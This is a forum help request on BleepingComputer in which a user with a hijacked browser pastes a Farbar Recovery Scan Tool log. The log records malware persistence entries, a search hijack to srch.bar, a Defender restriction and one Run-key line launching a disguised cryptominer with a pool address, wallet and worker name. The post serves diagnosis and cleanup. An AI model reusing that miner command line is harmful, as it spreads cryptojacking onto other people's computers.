Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected (not sure what) - Keep having to install google/firefox


  • This topic is locked This topic is locked
8 replies to this topic

#1 Description

Description

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:33 AM

Posted 21 November 2017 - 03:38 AM

As stated in title, I recently did something that made it so while searching in my start bar Google, or Firefox they won't show up.
If I download them again, they will leave off on the last page I was on, and also keep getting random tabs opening and redirecting me to random sites.

 

Please help, please and thank you!

 

 

 

 

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-11-2017
Ran by Jpoch (administrator) on DESKTOP-52F4FGA (21-11-2017 00:34:37)
Running from C:\Users\Jpoch\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads
Loaded Profiles: Jpoch (Available Profiles: defaultuser0 & Jpoch)
Platform: Windows 10 Home Version 1703 15063.726 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(hxxp://tortoisesvn.net) C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Spotify Ltd) C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Spotify Ltd) C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Team RuneMate) C:\Program Files (x86)\RuneMate\RuneMate.exe
() C:\Users\Jpoch\jagexcache\jagexlauncher\bin\JagexLauncher.exe
(Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8725248 1999-12-31] (Realtek Semiconductor)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation)
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM-x32\...\Run: [OPTIMIZER.EXE] => C:\Users\Jpoch\AppData\Local\Optimizer\Optimizer.exe [5691392 2017-11-20] (www.xmrig.com)
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-10] (Piriform Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3102496 2017-10-30] (Valve Corporation)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Spotify] => C:\Users\Jpoch\AppData\Roaming\Spotify\Spotify.exe [21025392 2017-11-13] (Spotify Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Spotify Web Helper] => C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe [777840 2017-11-13] (Spotify Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe" 
Startup: C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Twitch.lnk [2017-06-21]
ShortcutTarget: Twitch.lnk -> C:\Users\Jpoch\AppData\Roaming\Twitch\Bin\Twitch.exe (Twitch Interactive, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{57b6c9be-c784-47bf-ab26-3f1457b2998a}: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
Internet Explorer:
==================
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-11-19] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-11-19] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: eggor1db.default
FF ProfilePath: C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default [2017-11-21]
FF Extension: (uBlock Origin) - C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\Extensions\uBlock0@raymondhill.net.xpi [2017-11-20]
FF Extension: (Adblock Plus) - C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-10-27] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-10-27] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default [2017-11-20]
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1 [2017-11-21]
CHR Extension: (Slides) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-16]
CHR Extension: (Docs) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-16]
CHR Extension: (Google Drive) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-05]
CHR Extension: (YouTube) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-05]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (uBlock Origin) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-11-12]
CHR Extension: (Sheets) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-16]
CHR Extension: (Google Docs Offline) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-21]
CHR Extension: (Gmail) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-05]
CHR Extension: (Chrome Media Router) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-16]
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-19]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2015-09-28] ()
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [7770888 2017-05-09] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [518080 2017-10-10] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [518080 2017-10-10] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-10-27] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [460736 2017-10-10] (NVIDIA Corporation)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-19] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2015-09-28] ()
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [129152 2016-04-24] (Samsung Electronics Co., Ltd.)
S3 FlashUSB; C:\WINDOWS\System32\drivers\FlashUSB.sys [19968 2013-05-01] (Intel Mobile Communications)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
S3 mt7612US; C:\WINDOWS\System32\drivers\mt7612US.sys [377864 2015-12-09] (MediaTek Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_ref_pubwu.inf_amd64_2e7fa54192fe16d0\nvlddmkm.sys [16936048 2017-11-09] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-10-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [50624 2017-10-10] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-10-12] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [888064 1999-12-31] (Realtek )
S3 rzbtendpt; C:\WINDOWS\System32\drivers\rzbtendpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzdaendpt; C:\WINDOWS\System32\drivers\rzdaendpt.sys [42008 2016-06-23] (Razer Inc)
R3 rzendpt; C:\WINDOWS\System32\drivers\rzendpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzhnet; C:\WINDOWS\System32\Drivers\rzhnet.sys [29720 2016-06-23] (Razer Inc)
S3 rzjstk; C:\WINDOWS\System32\drivers\rzjstk.sys [36368 2016-06-23] (Razer Inc)
S3 rzkeypadendpt; C:\WINDOWS\System32\drivers\rzkeypadendpt.sys [45080 2016-06-23] (Razer Inc)
S3 rzmpos; C:\WINDOWS\System32\drivers\rzmpos.sys [47640 2016-06-23] (Razer Inc)
S3 rzp1endpt; C:\WINDOWS\System32\drivers\rzp1endpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzvkeyboard; C:\WINDOWS\System32\drivers\rzvkeyboard.sys [43544 2016-06-23] (Razer Inc)
S3 rzvmouse; C:\WINDOWS\System32\drivers\rzvmouse.sys [43544 2016-06-23] (Razer Inc)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SensorsSimulatorDriver; C:\WINDOWS\System32\drivers\WUDFRd.sys [220672 2017-03-18] (Microsoft Corporation)
S3 shspusb; C:\WINDOWS\System32\drivers\HSPUSB.sys [24064 2013-05-01] (MobileTop)
S3 sscdserd; C:\WINDOWS\System32\drivers\sscdserd.sys [158024 2013-05-01] (MCCI Corporation)
S3 ssceserd; C:\WINDOWS\System32\drivers\ssceserd.sys [158024 2013-05-01] (MCCI Corporation)
S3 ssdudfu; C:\WINDOWS\System32\drivers\ssdudfu.sys [101960 2013-05-01] (MCCI)
S3 ssm_bus; C:\WINDOWS\System32\drivers\ssm_bus.sys [136192 2013-05-01] (MCCI Corporation)
S3 ssm_mdm; C:\WINDOWS\System32\drivers\ssm_mdm.sys [172032 2013-05-01] (MCCI Corporation)
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-04-24] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [67864 2013-05-01] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_bserd; C:\WINDOWS\System32\drivers\ss_bserd.sys [128000 2013-05-01] (MCCI Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-11-20] ()
S3 t_mouse.sys; C:\WINDOWS\System32\drivers\t_mouse.sys [6144 2012-12-19] ()
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-05-29] (Zemana Ltd.)
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-11-21 00:22 - 2017-11-21 00:22 - 000000000 __HDC C:\OneDriveTemp
2017-11-21 00:22 - 2017-11-21 00:22 - 000000000 ____D C:\Program Files\U9K03QV4LJ
2017-11-20 23:50 - 2017-11-20 23:50 - 001652384 ____C ( ) C:\Users\Jpoch\Downloads\INSTALLER.EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 001652384 ____C ( ) C:\Users\Jpoch\Downloads\INSTALLER (1).EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 000570836 ____C C:\Users\Jpoch\Downloads\VMWAREWORKSTATIONFULL14_0_06661328.ZIP
2017-11-20 23:50 - 2017-11-20 23:50 - 000016904 _____ C:\WINDOWS\System32\Tasks\Yaminguict Explorer for ERC
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\Optimizer
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\P4B69KW31G
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\LVN8W6E40P
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\9F8KN5EJ25
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\8OK3IXWMOC
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files (x86)\1cqaldhh1t4
2017-11-20 21:08 - 2017-11-20 23:51 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-11-20 21:08 - 2017-11-20 21:08 - 036141704 ____C (Adlice Software ) C:\Users\Jpoch\Downloads\RogueKiller_setup_ref3.exe
2017-11-20 21:08 - 2017-11-20 21:08 - 000000899 ____C C:\Users\Public\Desktop\RogueKiller.lnk
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\ProgramData\RogueKiller
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\Program Files\RogueKiller
2017-11-20 20:59 - 2017-11-20 20:59 - 008261584 ____C (Malwarebytes) C:\Users\Jpoch\Downloads\AdwCleaner.exe
2017-11-20 20:58 - 2017-11-20 20:58 - 001790024 ____C (Malwarebytes) C:\Users\Jpoch\Downloads\JRT.exe
2017-11-20 20:52 - 2017-11-20 20:52 - 000054142 ____C C:\Users\Jpoch\Downloads\Shortcut.txt
2017-11-20 20:50 - 2017-11-21 00:34 - 000000000 ___DC C:\FRST
2017-11-20 20:48 - 2017-11-20 20:49 - 343075440 ____C C:\Users\Jpoch\Downloads\EmsisoftEmergencyKit.exe
2017-11-20 20:46 - 2017-11-20 20:46 - 001792640 ____C (Bleeping Computer, LLC) C:\Users\Jpoch\Downloads\rkill (1).exe
2017-11-20 20:45 - 2017-11-20 20:45 - 005659763 ____C (Swearware) C:\Users\Jpoch\Downloads\ComboFix (1).exe
2017-11-19 14:17 - 2017-11-19 14:17 - 000311176 ____C (Mozilla) C:\Users\Jpoch\Downloads\Firefox Installer.exe
2017-11-19 05:04 - 2017-11-19 05:04 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-11-19 05:04 - 2017-11-19 05:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-11-19 05:03 - 2017-11-19 05:03 - 001852992 ____C (Oracle Corporation) C:\Users\Jpoch\Downloads\JavaSetup8u151.exe
2017-11-19 05:03 - 2017-11-19 05:03 - 000000000 ___DC C:\Users\Jpoch\AppData\LocalLow\Oracle
2017-11-19 05:01 - 2017-11-19 05:04 - 000270912 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaws.exe
2017-11-19 05:01 - 2017-11-19 05:04 - 000000000 ____D C:\Program Files (x86)\Java
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ___DC C:\Users\Jpoch\OneDrive\Documents\EpicBot
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ____D C:\Users\Jpoch\AppData\Local\{2C8B1AD7-0823-766F-65BB-538741D3AF1F}
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ____D C:\ProgramData\Sun
2017-11-19 03:16 - 2017-11-19 03:17 - 485401816 ____C (VMware, Inc.) C:\Users\Jpoch\Downloads\VMware-workstation-full-14.0.0-6661328.exe
2017-11-19 03:05 - 2017-11-20 21:04 - 000000675 ____C C:\Users\Jpoch\Desktop\JRT.txt
2017-11-19 03:02 - 2017-11-20 20:47 - 000003082 ____C C:\Users\Jpoch\Desktop\Rkill.txt
2017-11-19 03:02 - 2017-11-19 03:02 - 005659763 ____C (Swearware) C:\Users\Jpoch\Downloads\ComboFix.exe
2017-11-19 03:02 - 2017-11-19 03:02 - 001792640 ____C (Bleeping Computer, LLC) C:\Users\Jpoch\Downloads\rkill.exe
2017-11-19 02:54 - 2017-11-20 21:03 - 000000000 ___DC C:\AdwCleaner
2017-11-19 02:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
